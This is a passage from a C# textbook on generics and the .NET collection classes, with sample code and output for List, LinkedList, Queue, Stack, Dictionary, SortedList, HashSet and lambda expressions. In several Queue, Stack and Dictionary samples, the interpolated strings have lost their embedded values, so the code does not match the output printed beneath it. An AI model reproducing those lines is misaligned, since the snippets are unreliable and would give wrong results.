BinarySearch methods need to be able to sort objects of any type. Without
using contravariance, the Sort and BinarySearch methods would need to
include logic that determines the real types of the items being sorted or
searched and then implement a type-specific sort or search mechanism.
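As a minimal sketch of this idea, the following fragment reuses the
ObjectComparer class shown earlier to sort a list of strings; the Sort
method accepts the comparer through an IComparer<string> reference
thanks to contravariance. (Note that the result is ordered by hash code
rather than alphabetically, because that is how ObjectComparer compares
items.)

List<string> words = new List<string> { "zebra", "apple", "mango" };
// Legal: IComparer<in T> is contravariant, so an IComparer<Object>
// can be used wherever an IComparer<string> is expected
IComparer<string> comparator = new ObjectComparer();
words.Sort(comparator);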
However, unless you are a mathematician, it can be quite difficult to recall
what covariance and contravariance actually do. The way I remember, based
on the examples in this section, is as follows:
Covariance example If the methods in a generic interface can return
strings, they can also return objects. (All strings are objects.)
Contravariance example If the methods in a generic interface can
take object parameters, they can take string parameters. (If you can
perform an operation by using an object, you can perform the same
operation by using a string because all strings are objects.)
Note As with covariance, only interface and delegate types can be
declared as contravariant. You do not specify the in modifier with
generic classes.
Summary
In this chapter, you learned how to use generics to create type-safe classes.
You saw how to instantiate a generic type by specifying a type parameter.
You also saw how to implement a generic interface and define a generic
method. Finally, you learned how to define covariant and contravariant
generic interfaces that can operate with a hierarchy of types.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 18.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To instantiate an object by using a generic type, specify the
appropriate generic type parameter. For example:

Queue<int> myQueue = new Queue<int>();

To create a new generic type, define the class by using a type
parameter. For example:

public class Tree<TItem>
{
    ...
}

To restrict the type that can be substituted for the generic type
parameter, specify a constraint by using a where clause when defining
the class. For example:

public class Tree<TItem> where TItem : IComparable<TItem>
{
    ...
}

To define a generic method, define the method by using type parameters.
For example:

static void InsertIntoTree<TItem>(Tree<TItem> tree, params TItem[] data)
{
    ...
}

To invoke a generic method, provide types for each of the type
parameters. For example:

InsertIntoTree<char>(charTree, 'Z', 'X');

To define a covariant interface, specify the out qualifier for
covariant type parameters. Reference the covariant type parameters only
as the return types from methods and not as the types for method
parameters:

interface IRetrieveWrapper<out T>
{
    T GetData();
}

To define a contravariant interface, specify the in qualifier for
contravariant type parameters. Reference the contravariant type
parameters only as the types of method parameters and not as return
types:

public interface IComparer<in T>
{
    int Compare(T x, T y);
}
CHAPTER 18
Using collections
After completing this chapter, you will be able to:
Explain the functionality provided in the different collection classes
available with the .NET Framework.
Create type-safe collections.
Populate a collection with a set of data.
Manipulate and access the data items held in a collection.
Search a list-oriented collection for matching items by using a
predicate.
Chapter 10, “Using arrays,” introduces arrays for holding sets of data.
Arrays are very useful in this respect, but they have their limitations. Arrays
provide only limited functionality; for example, it is not easy to increase or
reduce the size of an array, and neither is it a simple matter to sort the data
held in an array. Also, arrays only really provide a single means of accessing
data—by using an integer index. If your application needs to store and
retrieve data by using some other mechanism, such as the first-in, first-out
queue mechanism described in Chapter 17, “Introducing generics,” arrays
might not be the most suitable data structure to use. This is where collections
can prove useful.
What are collection classes?
The Microsoft .NET Framework provides several classes that collect
elements together such that an application can access the elements in
specialized ways. These are the collection classes mentioned in Chapter 17,
and they live in the System.Collections.Generic namespace.
As the namespace implies, these collections are generic types; they all
expect you to provide a type parameter indicating the kind of data that your
application will be storing in them. Each collection class is optimized for a
particular form of data storage and access, and each provides specialized
methods that support this functionality. For example, the Stack<T> class
implements a last-in, first-out model, where you add an item to the top of the
stack by using the Push method, and you take an item from the top of the
stack by using the Pop method. The Pop method always retrieves the most
recently pushed item and removes it from the stack. In contrast, the
Queue<T> type provides the Enqueue and Dequeue methods described in
Chapter 17. The Enqueue method adds an item to the queue, while the
Dequeue method retrieves items from the queue in the same order,
implementing a first-in, first-out model. A variety of other collection classes
are also available, and the following table provides a summary of the most
commonly used ones.
List<T>: A list of objects that can be accessed by index, as with an
array, but with additional methods with which to search the list and
sort the contents of the list.

Queue<T>: A first-in, first-out data structure, with methods to add an
item to one end of the queue, remove an item from the other end, and
examine an item without removing it.

Stack<T>: A last-in, first-out data structure with methods to push an
item onto the top of the stack, pop an item from the top of the stack,
and examine the item at the top of the stack without removing it.

LinkedList<T>: A double-ended ordered list, optimized to support
insertion and removal at either end. This collection can act like a
queue or a stack, but it also supports random access as a list does.

HashSet<T>: An unordered set of values that is optimized for fast
retrieval of data. It provides set-oriented methods for determining
whether the items it holds are a subset of those in another HashSet<T>
object as well as computing the intersection and union of HashSet<T>
objects.

Dictionary<TKey, TValue>: A collection of values that can be identified
and retrieved by using keys rather than indexes.

SortedList<TKey, TValue>: A sorted list of key/value pairs. The keys
must implement the IComparable<T> interface.
The following sections provide a brief overview of these collection
classes. Refer to the .NET Framework class library documentation for more
details on each class.
Note The .NET Framework class library also provides another set of
collection types in the System.Collections namespace. These are
nongeneric collections, and they were designed before C# supported
generic types (generics were added to the version of C# developed for
the .NET Framework version 2.0). With one exception, these types all
store object references, and you are required to perform the appropriate
casts when you store and retrieve items. These classes are included for
backward compatibility with existing applications, and it is not
recommended that you use them when building new solutions. In fact,
these classes are not available if you are building Universal Windows
Platform (UWP) apps.
The one class that does not store object references is the BitArray
class. This class implements a compact array of Boolean values by
using an int; each bit indicates true (1) or false (0). If this sounds
familiar, it should; this is very similar to the IntBits struct that you saw
in the examples in Chapter 16, “Handling binary data and using
indexers.” The BitArray class is available to UWP apps.
One other important set of collections is available, and these classes
are defined in the System.Collections.Concurrent namespace. These are
thread-safe collection classes that you can use when you’re building
multithreaded applications. Chapter 24, “Improving response time by
performing asynchronous operations,” provides more information on
these classes.
The List<T> collection class
The generic List<T> class is the simplest of the collection classes. You can
use it much like you use an array—you can reference an existing element in a
List<T> collection by using ordinary array notation, with square brackets and
the index of the element, although you cannot use array notation to add new
elements. However, in general, the List<T> class provides more flexibility
than arrays do and is designed to overcome the following restrictions
exhibited by arrays:
If you want to resize an array, you have to create a new array, copy the
elements (leaving out some if the new array is smaller), and then
update any references to the original array so that they refer to the new
array.
If you want to remove an element from an array, you have to move all
the trailing elements up by one place. Even this doesn’t quite work
because you end up with two copies of the last element.
If you want to insert an element into an array, you have to move
elements down by one place to make a free slot. However, you lose the
last element of the array!
The List<T> collection class provides the following features that preclude
these limitations:
You don’t need to specify the capacity of a List<T> collection when
you create it; it can grow and shrink as you add elements. There is an
overhead associated with this dynamic behavior, and if necessary, you
can specify an initial size. However, if you exceed this size, the
List<T> collection simply grows as necessary.
You can remove a specified element from a List<T> collection by
using the Remove method. The List<T> collection automatically
reorders its elements and closes the gap. You can also remove an item
at a specified position in a List<T> collection by using the RemoveAt
method.
You can add an element to the end of a List<T> collection by using its
Add method. You supply the element to be added. The List<T>
collection resizes itself automatically.
You can insert an element into the middle of a List<T> collection by
using the Insert method. Again, the List<T> collection resizes itself.
You can easily sort the data in a List<T> object by calling the Sort
method.
Note As with arrays, if you use foreach to iterate through a List<T>
collection, you cannot use the iteration variable to modify the contents
of the collection. Additionally, you cannot call the Remove, Add, or
Insert method in a foreach loop that iterates through a
List<T> collection; any attempt to do so results in an
InvalidOperationException exception.
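One safe alternative, sketched below under the assumption that you want
to remove matching items, is to iterate with an ordinary for statement,
working backward so that removing an element does not shift the
positions of the elements still to be visited:

List<int> values = new List<int>() { 3, 0, 7, 0, 2 };
// Iterate backward; removing an element only shifts items at higher
// indexes, which have already been examined
for (int i = values.Count - 1; i >= 0; i--)
{
    if (values[i] == 0)
    {
        values.RemoveAt(i);
    }
}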
Here’s an example that shows how you can create, manipulate, and iterate
through the contents of a List<int> collection:
using System;
using System.Collections.Generic;
...
List<int> numbers = new List<int>();
// Fill the List<int> by using the Add method
foreach (int number in new int[12]{10, 9, 8, 7, 7, 6, 5, 10, 4, 3, 2, 1})
{
numbers.Add(number);
}
// Insert an element in the penultimate position in the list, and move the last item up
// The first parameter is the position; the second parameter is the value being inserted
numbers.Insert(numbers.Count-1, 99);
// Remove the first element whose value is 7 (the 4th element, index 3)
numbers.Remove(7);
// Remove the element that's now the 7th element (index 6)
numbers.RemoveAt(6);
// Iterate the remaining 11 elements using a for statement
Console.WriteLine("Iterating using a for statement:");
for (int i = 0; i < numbers.Count; i++)
{
int number = numbers[i]; // Note the use of array syntax
Console.WriteLine(number);
}
// Iterate the same 11 elements using a foreach statement
Console.WriteLine("\nIterating using a foreach statement:");
foreach (int number in numbers)
{
Console.WriteLine(number);
}
Here is the output of this code:
Iterating using a for statement:
10
9
8
7
6
5
4
3
2
99
1
Iterating using a foreach statement:
10
9
8
7
6
5
4
3
2
99
1
Note The way you determine the number of elements for a List<T>
collection is different from querying the number of items in an array.
When using a List<T> collection, you examine the Count property;
when using an array, you examine the Length property.
The LinkedList<T> collection class
The LinkedList<T> collection class implements a doubly linked list. Each
item in the list holds the value for that item together with a reference to the
next item in the list (the Next property) and the previous item (the Previous
property). The item at the start of the list has the Previous property set to null,
and the item at the end of the list has the Next property set to null.
Unlike the List<T> class, LinkedList<T> does not support array notation
for inserting or examining elements. Instead, you can use the AddFirst
method to insert an element at the start of the list, moving the previous first
item up and setting its Previous property to refer to the new item. Similarly,
you can use the AddLast method to insert an element at the end of the list,
setting the Next property of the previously last item to refer to the new item.
You can also use the AddBefore and AddAfter methods to insert an element
before or after a specified item in the list (you have to retrieve the item first).
You can find the first item in a LinkedList<T> collection by querying the
First property, whereas the Last property returns a reference to the final item
in the list. To iterate through a linked list, you can start at one end and step
through the Next or Previous references until you find an item with a null
value for this property. Alternatively, you can use a foreach statement, which
iterates forward through a LinkedList<T> object and stops automatically at
the end.
You delete an item from a LinkedList<T> collection by using the Remove,
RemoveFirst, and RemoveLast methods.
The following example shows a LinkedList<T> collection in action.
Notice how the code that iterates through the list by using a for statement
steps through the Next (or Previous) references, stopping only when it
reaches a null reference, which is the end of the list:
using System;
using System.Collections.Generic;
...
LinkedList<int> numbers = new LinkedList<int>();
// Fill the LinkedList<int> by using the AddFirst method
foreach (int number in new int[] { 10, 8, 6, 4, 2 })
{
numbers.AddFirst(number);
}
// Iterate using a for statement
Console.WriteLine("Iterating using a for statement:");
for (LinkedListNode<int> node = numbers.First; node != null; node = node.Next)
{
int number = node.Value;
Console.WriteLine(number);
}
// Iterate using a foreach statement
Console.WriteLine("\nIterating using a foreach statement:");
foreach (int number in numbers)
{
Console.WriteLine(number);
}
// Iterate backwards
Console.WriteLine("\nIterating list in reverse order:");
for (LinkedListNode<int> node = numbers.Last; node != null; node = node.Previous)
{
int number = node.Value;
Console.WriteLine(number);
}
Here is the output generated by this code:
Iterating using a for statement:
2
4
6
8
10
Iterating using a foreach statement:
2
4
6
8
10
Iterating list in reverse order:
10
8
6
4
2
The Queue<T> collection class
The Queue<T> class implements a first-in, first-out mechanism. An element
is inserted into the queue at the back (the Enqueue operation) and is removed
from the queue at the front (the Dequeue operation).
The following code is an example showing a Queue<int> collection and
its common operations:
using System;
using System.Collections.Generic;
...
Queue<int> numbers = new Queue<int>();
// fill the queue
Console.WriteLine("Populating the queue:");
foreach (int number in new int[4]{9, 3, 7, 2})
{
numbers.Enqueue(number);
Console.WriteLine($" has joined the queue");
}
// iterate through the queue
Console.WriteLine("\nThe queue contains the following items:");
foreach (int number in numbers)
{
Console.WriteLine(number);
}
// empty the queue
Console.WriteLine("\nDraining the queue:");
while (numbers.Count > 0)
{
int number = numbers.Dequeue();
Console.WriteLine($" has left the queue");
}
Here is the output from this code:
Populating the queue:
9 has joined the queue
3 has joined the queue
7 has joined the queue
2 has joined the queue
The queue contains the following items:
9
3
7
2
Draining the queue:
9 has left the queue
3 has left the queue
7 has left the queue
2 has left the queue
The Stack<T> collection class
The Stack<T> class implements a last-in, first-out mechanism. An element
joins the stack at the top (the push operation) and leaves the stack at the top
(the pop operation). To visualize this, think of a stack of dishes: new dishes
are added to the top and dishes are removed from the top, making the last
dish to be placed on the stack the first one to be removed. (The dish at the
bottom is rarely used and will inevitably require washing before you can put
any food on it—because it will be covered in grime!) Here’s an example—
notice the order in which the items are listed by the foreach loop:
using System;
using System.Collections.Generic;
...
Stack<int> numbers = new Stack<int>();
// fill the stack
Console.WriteLine("Pushing items onto the stack:");
foreach (int number in new int[4]{9, 3, 7, 2})
{
numbers.Push(number);
Console.WriteLine($" has been pushed on the stack");
}
// iterate through the stack
Console.WriteLine("\nThe stack now contains:");
foreach (int number in numbers)
{
Console.WriteLine(number);
}
// empty the stack
Console.WriteLine("\nPopping items from the stack:");
while (numbers.Count > 0)
{
int number = numbers.Pop();
Console.WriteLine($" has been popped off the stack");
}
Here is the output from this program:
Pushing items onto the stack:
9 has been pushed on the stack
3 has been pushed on the stack
7 has been pushed on the stack
2 has been pushed on the stack
The stack now contains:
2
7
3
9
Popping items from the stack:
2 has been popped off the stack
7 has been popped off the stack
3 has been popped off the stack
9 has been popped off the stack
The Dictionary<TKey, TValue> collection class
The array and List<T> types provide a way to map an integer index to an
element. You specify an integer index within square brackets (for example,
[4]), and you get back the element at index 4 (which is actually the fifth
element). However, sometimes you might want to implement a mapping in
which the type from which you map is not an int but some other type, such as
string, double, or Time. In other languages, this is often called an associative
array. The Dictionary<TKey, TValue> class implements this functionality by
internally maintaining two arrays, one for the keys from which you’re
mapping and one for the values to which you’re mapping. When you insert a
key/value pair into a Dictionary<TKey, TValue> collection, it automatically
tracks which key belongs to which value and makes it possible for you to
retrieve the value that is associated with a specified key quickly and easily.
The design of the Dictionary<TKey, TValue> class has some important
consequences:
A Dictionary<TKey, TValue> collection cannot contain duplicate keys.
If you call the Add method to add a key that is already present in the
keys array, you’ll get an exception. You can, however, use the square
brackets notation to add a key/value pair (as shown in the following
example) without danger of an exception, even if the key has already
been added; any existing value with the same key will be overwritten
by the new value. You can test whether a Dictionary<TKey, TValue>
collection already contains a particular key by using the ContainsKey
method.
Internally, a Dictionary<TKey, TValue> collection is a sparse data
structure that operates most efficiently when it has plenty of memory
with which to work. The size of a Dictionary<TKey, TValue>
collection in memory can grow quite quickly as you insert more
elements.
When you use a foreach statement to iterate through a
Dictionary<TKey, TValue> collection, you get back a
KeyValuePair<TKey, TValue> item. This is a structure that contains a
copy of the key and value elements of an item in the Dictionary<TKey,
TValue> collection, and you can access each element through the Key
property and the Value property. These elements are read-only; you
cannot use them to modify the data in the Dictionary<TKey, TValue>
collection.
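The following fragment is a small sketch of the first of these points
(the key names are invented for illustration). The indexer silently
overwrites the value for an existing key, whereas calling Add with a
duplicate key throws an exception; ContainsKey and the related
TryGetValue method let you test for a key safely:

Dictionary<string, int> stock = new Dictionary<string, int>();
stock["widget"] = 10;    // adds the key/value pair
stock["widget"] = 15;    // overwrites the existing value; no exception
// stock.Add("widget", 20);   // this would throw an exception
if (stock.ContainsKey("widget"))
{
    Console.WriteLine($"widget: {stock["widget"]}");
}
int quantity;
if (stock.TryGetValue("gadget", out quantity))   // returns false; no "gadget" key
{
    Console.WriteLine($"gadget: {quantity}");
}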
Here is an example that associates the ages of members of my family with
their names and then prints the information:
using System;
using System.Collections.Generic;
...
Dictionary<string, int> ages = new Dictionary<string, int>();
// fill the Dictionary
ages.Add("John", 53); // using the Add method
ages.Add("Diana", 53);
ages["James"] = 26; // using array notation
ages["Francesca"] = 23;
// iterate using a foreach statement
// the iterator generates a KeyValuePair item
Console.WriteLine("The Dictionary contains:");
foreach (KeyValuePair<string, int> element in ages)
{
string name = element.Key;
int age = element.Value;
Console.WriteLine($"Name: , Age: ");
}
Here is the output from this program:
The Dictionary contains:
Name: John, Age: 53
Name: Diana, Age: 53
Name: James, Age: 26
Name: Francesca, Age: 23
Note The System.Collections.Generic namespace also includes the
SortedDictionary<TKey, TValue> collection type. This class maintains
the collection in order, sorted by the keys.
The SortedList<TKey, TValue> collection class
The SortedList<TKey, TValue> class is very similar to the Dictionary<TKey,
TValue> class in that you can use it to associate keys with values. The
primary difference is that the keys array is always sorted. (It is called a
SortedList, after all.) It takes longer to insert data into a SortedList<TKey,
TValue> object than a SortedDictionary<TKey, TValue> object in most
cases, but data retrieval is often quicker (or at least as quick), and the
SortedList<TKey, TValue> class uses less memory.
When you insert a key/value pair into a SortedList<TKey, TValue>
collection, the key is inserted into the keys array at the correct index to keep
the keys array sorted. The value is then inserted into the values array at the
same index. The SortedList<TKey, TValue> class automatically ensures that
keys and values remain synchronized, even when you add and remove
elements. This means that you can insert key/value pairs into a
SortedList<TKey, TValue> in any sequence; they are always sorted based on
the value of the keys.
Like the Dictionary<TKey, TValue> class, a SortedList<TKey, TValue>
collection cannot contain duplicate keys. When you use a foreach statement
to iterate through a SortedList<TKey, TValue>, you receive back a
KeyValuePair<TKey, TValue> item. However, the KeyValuePair<TKey,
TValue> items will be returned sorted by the Key property.
Here is the same example that associates the ages of members of my
family with their names and then prints the information, but this version has
been adjusted to use a SortedList<TKey, TValue> object rather than a
Dictionary<TKey, TValue> collection:
using System;
using System.Collections.Generic;
...
SortedList<string, int> ages = new SortedList<string, int>();
// fill the SortedList
ages.Add("John", 53); // using the Add method
ages.Add("Diana", 53);
ages["James"] = 26; // using array notation
ages["Francesca"] = 23;
// iterate using a foreach statement
// the iterator generates a KeyValuePair item
Console.WriteLine("The SortedList contains:");
foreach (KeyValuePair<string, int> element in ages)
{
string name = element.Key;
int age = element.Value;
Console.WriteLine($"Name: , Age: ");
}
The output from this program is sorted alphabetically by the names of my
family members:
The SortedList contains:
Name: Diana, Age: 53
Name: Francesca, Age: 23
Name: James, Age: 26
Name: John, Age: 53
The HashSet<T> collection class
The HashSet<T> class is optimized for performing set operations, such as
determining set membership and generating the union and intersection of
sets.
You insert items into a HashSet<T> collection by using the Add method,
and you delete items by using the Remove method. However, the real power
of the HashSet<T> class is provided by the IntersectWith, UnionWith, and
ExceptWith methods. These methods modify a HashSet<T> collection to
generate a new set that either intersects with, has a union with, or does not
contain the items in a specified HashSet<T> collection. These operations are
destructive inasmuch as they overwrite the contents of the original
HashSet<T> object with the new set of data. You can also determine whether
the data in one HashSet<T> collection is a superset or subset of another by
using the IsSubsetOf, IsSupersetOf, IsProperSubsetOf, and
IsProperSupersetOf methods. These methods return a Boolean value and are
nondestructive.
Internally, a HashSet<T> collection is held as a hash table, enabling the
fast lookup of items. However, a large HashSet<T> collection can require a
significant amount of memory to operate quickly.
The following example shows how to populate a HashSet<T> collection
and illustrates the use of the IntersectWith method to find data that overlaps
two sets:
using System;
using System.Collections.Generic;
...
HashSet<string> employees = new HashSet<string>(new string[]
{"Fred","Bert","Harry","John"});
HashSet<string> customers = new HashSet<string>(new string[]
{"John","Sid","Harry","Diana"});
employees.Add("James");
customers.Add("Francesca");
Console.WriteLine("Employees:");
foreach (string name in employees)
{
Console.WriteLine(name);
}
Console.WriteLine("");
Console.WriteLine("Customers:");
foreach (string name in customers)
{
Console.WriteLine(name);
}
Console.WriteLine("\nCustomers who are also employees:");
customers.IntersectWith(employees);
foreach (string name in customers)
{
Console.WriteLine(name);
}
This code generates the following output:
Employees:
Fred
Bert
Harry
John
James
Customers:
John
Sid
Harry
Diana
Francesca
Customers who are also employees:
John
Harry
Note The System.Collections.Generic namespace also provides the
SortedSet<T> collection type, which operates similarly to the
HashSet<T> class. The primary difference, as the name implies, is that
the data is maintained in a sorted order. The SortedSet<T> and
HashSet<T> classes are interoperable; you can take the union of a
SortedSet<T> collection with a HashSet<T> collection, for example.
Using collection initializers
The examples in the preceding subsections have shown you how to add
individual elements to a collection by using the method most appropriate to
that collection (Add for a List<T> collection, Enqueue for a Queue<T>
collection, Push for a Stack<T> collection, and so on). You can also initialize
some collection types when you declare them by using a syntax similar to that
supported by arrays. For example, the following statement creates and
initializes the numbers List<int> object shown earlier, demonstrating an
alternative to repeatedly calling the Add method:
List<int> numbers = new List<int>(){10, 9, 8, 7, 7, 6, 5, 10, 4, 3,
2, 1};
Internally, the C# compiler converts this initialization to a series of calls to
the Add method. Consequently, you can use this syntax only for collections
that actually support the Add method. (The Stack<T> and Queue<T> classes
do not.)
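If you need to pre-populate a Stack<T> or Queue<T> collection, you can instead pass an existing sequence to the constructor, as in this brief sketch:

// Stack<T> and Queue<T> have no Add method, so initialize them from an
// existing array (or any IEnumerable<T>) by using the constructor:
Queue<int> queue = new Queue<int>(new int[] { 1, 2, 3 });
Stack<int> stack = new Stack<int>(new int[] { 1, 2, 3 });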
For more complex collections that take key/value pairs, such as the
Dictionary<TKey, TValue> class, you can use indexer notation to specify a
value for each key, like this:
Dictionary<string, int> ages = new Dictionary<string, int>()
{
["John"] = 53,
["Diana"] = 53,
["James"] = 26,
["Francesca"] = 23
};
If you prefer, you can also specify each key/value pair as an anonymous
type in the initializer list, like this:
Dictionary<string, int> ages = new Dictionary<string, int>()
{
{"John", 53},
{"Diana", 53},
{"James", 26},
{"Francesca", 23}
};
In this case, the first item in each pair is the key, and the second is the
value. To make your code as readable as possible, I recommend that you use
the indexer notation wherever possible when you initialize a dictionary type.
The Find methods, predicates, and lambda expressions
Using the dictionary-oriented collections (Dictionary<TKey, TValue>,
SortedDictionary<TKey, TValue>, and SortedList<TKey, TValue>), you can
quickly find a value by specifying the key to search for, and you can use
array notation to access the value, as you have seen in earlier examples. Other
collections that support nonkeyed random access, such as the List<T> and
LinkedList<T> classes, do not support array notation but instead provide the
Find method to locate an item. For these classes, the argument to the Find
method is a predicate that specifies the search criteria to use. The form of a
predicate is a method that examines each item in the collection and returns a
Boolean value indicating whether the item matches. In the case of the Find
method, as soon as the first match is found, the corresponding item is
returned. Note that the List<T> and LinkedList<T> classes also support
other methods, such as FindLast, which returns the last matching object, and
the List<T> class additionally provides the FindAll method, which returns a
List<T> collection of all matching objects.
The easiest way to specify the predicate is to use a lambda expression. A
lambda expression is an expression that returns a method. This sounds rather
odd because most expressions that you have encountered so far in C# actually
return a value. If you are familiar with functional programming languages
such as Haskell, you are probably comfortable with this concept. If you are
not, fear not: lambda expressions are not particularly complicated, and after
you have become accustomed to a new bit of syntax, you will see that they
are very useful.
Note If you are interested in finding out more about functional
programming with Haskell, visit the Haskell programming language
website at http://www.haskell.org/haskellwiki/.
Chapter 3, “Writing methods and applying scope,” explains that a typical
method consists of four elements: a return type, a method name, a list of
parameters, and a method body. A lambda expression contains two of these
elements: a list of parameters and a method body. Lambda expressions do not
define a method name, and the return type (if any) is inferred from the
context in which the lambda expression is used. In the case of the Find
method, the predicate processes each item in the collection in turn; the body
of the predicate must examine the item and return true or false depending on
whether it matches the search criteria. The example that follows shows the
Find method (highlighted in bold) on a List<Person> collection, where
Person is a struct. The Find method returns the first item in the list that has
the ID property set to 3:
struct Person
{
public int ID { get; set; }
public string Name { get; set; }
public int Age { get; set; }
}
...
// Create and populate the personnel list
List<Person> personnel = new List<Person>()
{
new Person() { ID = 1, Name = "John", Age = 53 },
new Person() { ID = 2, Name = "Sid", Age = 28 },
new Person() { ID = 3, Name = "Fred", Age = 34 },
new Person() { ID = 4, Name = "Paul", Age = 22 },
};
// Find the member of the list that has an ID of 3
Person match = personnel.Find((Person p) => { return p.ID == 3; });
Console.WriteLine($"ID: {match.ID}\nName: {match.Name}\nAge:
{match.Age}");
Here is the output generated by this code:
ID: 3
Name: Fred
Age: 34
In the call to the Find method, the argument (Person p) => { return p.ID
== 3; } is a lambda expression that actually does the work. It has the
following syntactic items:
A list of parameters enclosed in parentheses. As with a regular method,
if the method you are defining takes no parameters, you must still
provide an empty pair of parentheses. In the case of the
Find method, the predicate is provided with each item from the
collection in turn, and this item is passed as the parameter to the
lambda expression.
The => operator, which indicates to the C# compiler that this is a
lambda expression.
The body of the method. The example shown here is very simple,
containing a single statement that returns a Boolean value indicating
whether the item specified in the parameter matches the search criteria.
However, a lambda expression can contain multiple statements, and
you can format it in whatever way you feel is most readable. Just
remember to add a semicolon after each statement, as you would in an
ordinary method.
Important You also saw in Chapter 3 how the => operator is used to
define expression-bodied methods. Rather confusingly, this is a
somewhat overloaded use of the => operator. Although there are some
notional similarities, expression-bodied methods and lambda
expressions are semantically (and functionally) quite different beasts;
you should not confuse them.
Strictly speaking, the body of a lambda expression can be a method body
containing multiple statements or be a single expression. If the body of a
lambda expression contains only a single expression, you can omit the braces
and the semicolon (but you still need a semicolon to complete the entire
statement). Additionally, if the expression takes a single parameter, you can
omit the parentheses that surround the parameter. Finally, in many cases, you
can actually omit the type of the parameters because the compiler can infer
this information from the context from which the lambda expression is
invoked. A simplified form of the Find statement shown previously looks
like this (which is much easier to read and understand):
Person match = personnel.Find(p => p.ID == 3);
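The FindAll and FindLast methods mentioned earlier take the same style of predicate. Assuming the personnel list shown above, a brief sketch:

List<Person> youngsters = personnel.FindAll(p => p.Age < 30); // Sid and Paul
Person lastMatch = personnel.FindLast(p => p.Age < 30);       // Paul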
The forms of lambda expressions
Lambda expressions are very powerful constructs, and you will encounter
them with increasing frequency as you delve deeper into C# programming.
The expressions themselves can take some subtly different forms. Lambda
expressions were originally part of a mathematical notation called the lambda
calculus, which provides a notation for describing functions. (You can think
of a function as a method that returns a value.) Although the C# language has
extended the syntax and semantics of the lambda calculus in its
implementation of lambda expressions, many of the original principles still
apply. Here are some examples showing the different forms of lambda
expressions available in C#:
x => x * x                   // A simple expression that returns the square of its
                             // parameter. The type of parameter x is inferred from
                             // the context.

x => { return x * x; }       // Semantically the same as the preceding expression,
                             // but using a C# statement block as a body rather
                             // than a simple expression

(int x) => x / 2             // A simple expression that returns the value of the
                             // parameter divided by 2. The type of parameter x is
                             // stated explicitly.

() => folder.StopFolding(0)  // Calling a method. The expression takes no
                             // parameters and might or might not return a value.

(x, y) => { x++; return x / y; }   // Multiple parameters; the compiler infers the
                                   // parameter types. The parameter x is passed by
                                   // value, so the effect of the ++ operation is
                                   // local to the expression.

(ref int x, int y) => { x++; return x / y; }   // Multiple parameters with explicit
                                               // types. Parameter x is passed by
                                               // reference, so the effect of the
                                               // ++ operation is permanent.
To summarize, here are some features of lambda expressions of which
you should be aware:
If a lambda expression takes parameters, you specify them in the
parentheses to the left of the => operator. You can omit the types of
parameters, and the C# compiler will infer their types from the context
of the lambda expression. You can pass parameters by reference (by
using the ref keyword) if you want the lambda expression to be able to
change its values other than locally, but this is not recommended.
Lambda expressions can return values, but the return type must match
that of the corresponding delegate.
The body of a lambda expression can be a simple expression or a block
of C# code made up of multiple statements, method calls, variable
definitions, and other code items.
Variables defined in a lambda expression method go out of scope when
the method finishes.
A lambda expression can access and modify all variables outside the
lambda expression that are in scope when the lambda expression is
defined. Be very careful with this feature!
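To illustrate the final point, here is a minimal sketch (using the System.Action delegate type to hold the lambda expression):

int counter = 0;
Action increment = () => counter++; // the lambda captures the outer variable counter
increment();
increment();
Console.WriteLine(counter); // Outputs 2; both calls modified the captured variable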
Lambda expressions and anonymous methods
Lambda expressions were added to the C# language in version 3.0. C#
version 2.0 introduced anonymous methods, which can perform a
similar task but are not as flexible. Anonymous methods were added
primarily so that you can define delegates without having to create a
named method; you simply provide the definition of the method body in
place of the method name, like this:
this.stopMachinery += delegate { folder.StopFolding(0); };
You can also pass an anonymous method as a parameter in place of a
delegate, like this:
control.Add(delegate { folder.StopFolding(0); } );
Notice that whenever you introduce an anonymous method, you
must prefix it with the delegate keyword. Also, any parameters needed
are specified in parentheses following the delegate keyword, as
illustrated in the following example:
control.Add(delegate(int param1, string param2)
{ /* code that uses param1 and param2 */ ... });
Lambda expressions provide a more succinct and natural syntax than
anonymous methods, and they pervade many of the more advanced
aspects of C#, as you will see throughout the subsequent chapters in this
book. Generally speaking, you should use lambda expressions rather
than anonymous methods in your code.
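For example, reusing the folder and stopMachinery names from the snippets above, the lambda expression equivalent of the first anonymous method is:

// Anonymous method syntax:
this.stopMachinery += delegate { folder.StopFolding(0); };

// Equivalent, more succinct lambda expression syntax:
this.stopMachinery += () => folder.StopFolding(0);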
Comparing arrays and collections
Here’s a summary of the important differences between arrays and
collections:
An array instance has a fixed size and cannot grow or shrink. A
collection can dynamically resize itself as required.
An array can have more than one dimension. A collection is linear.
However, the items in a collection can be collections themselves, so
you can imitate a multidimensional array as a collection of collections.
You store and retrieve an item in an array by using an index. Not all
collections support this notion. For example, to store an item in a
List<T> collection, you use the Add or Insert method, and to retrieve
an item, you use the Find method.
Many of the collection classes provide a ToArray method that creates
and populates an array containing the items in the collection. The items
are copied to the array and are not removed from the collection.
Additionally, these collections provide constructors that can populate a
collection directly from an array.
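The last two points can be illustrated with a short sketch (the names are arbitrary):

List<int> numbers = new List<int>() { 3, 1, 2 };
int[] asArray = numbers.ToArray();       // copies the items; numbers is unchanged
List<int> copy = new List<int>(asArray); // populates a new collection from an array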
Using collection classes to play cards
In the next exercise, you will convert the card game developed in Chapter 10
to use collections rather than arrays.
Use collections to implement a card game
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Cards solution, which is located in the \Microsoft
Press\VCSBS\Chapter 18\Cards folder in your Documents folder.
This project contains an updated version of the project from Chapter 10
that deals hands of cards by using arrays. The PlayingCard class is
modified to expose the value and suit of a card as read-only properties.
3. Display the Pack.cs file in the Code and Text Editor window. Add the
following using directive to the top of the file:
using System.Collections.Generic;
4. In the Pack class, change the definition of the cardPack two-
dimensional array to a Dictionary<Suit, List<PlayingCard>> object, as
shown here in bold:
class Pack
{
...
private Dictionary<Suit, List<PlayingCard>> cardPack;
...
}
The original application used a two-dimensional array for representing a
pack of cards. This code replaces the array with a Dictionary, where the
key specifies the suit and the value is a list of cards in that suit.
5. Locate the Pack constructor. Modify the first statement in this
constructor to instantiate the cardPack variable as a new Dictionary
collection rather than as an array, as shown here in bold:
public Pack()
{
this.cardPack = new Dictionary<Suit, List<PlayingCard>>
(NumSuits);
...
}
Although a Dictionary collection will resize itself automatically as items
are added, if the collection is unlikely to change in size, you can specify
an initial size when you instantiate it. This helps to optimize the memory
allocation (although the Dictionary collection can still grow if this size
is exceeded). In this case, the Dictionary collection will contain a
